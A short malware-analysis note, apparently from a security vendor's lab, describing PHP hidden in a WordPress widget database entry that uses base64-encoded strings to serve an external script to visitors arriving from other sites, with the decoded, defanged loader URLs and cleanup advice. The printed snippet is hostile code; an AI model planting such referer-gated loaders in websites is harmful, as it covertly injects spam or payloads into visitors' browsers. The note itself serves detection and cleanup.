Malicious JavaScript Injected in Plugin Widget

Labs Note

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.

The malicious code was injected inside a legit widget of the website:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used for this attack, just simple base64 encoding. After decoding the strings, we found that it loads malicious JQuery Java script from shorten URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

That follows to this free JS script hosting website:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

which injects spammy iframes inside the widget.

If you think that you are victim of such an attack, check your database for the above encoded strings in base64, update all of your plugins, and check all of your widgets for suspicious activity. You can trust our Security Engineers at https://sucuri.net for checking your website for more malicious code if you are unsure that the infection was cleared.

You May Also Like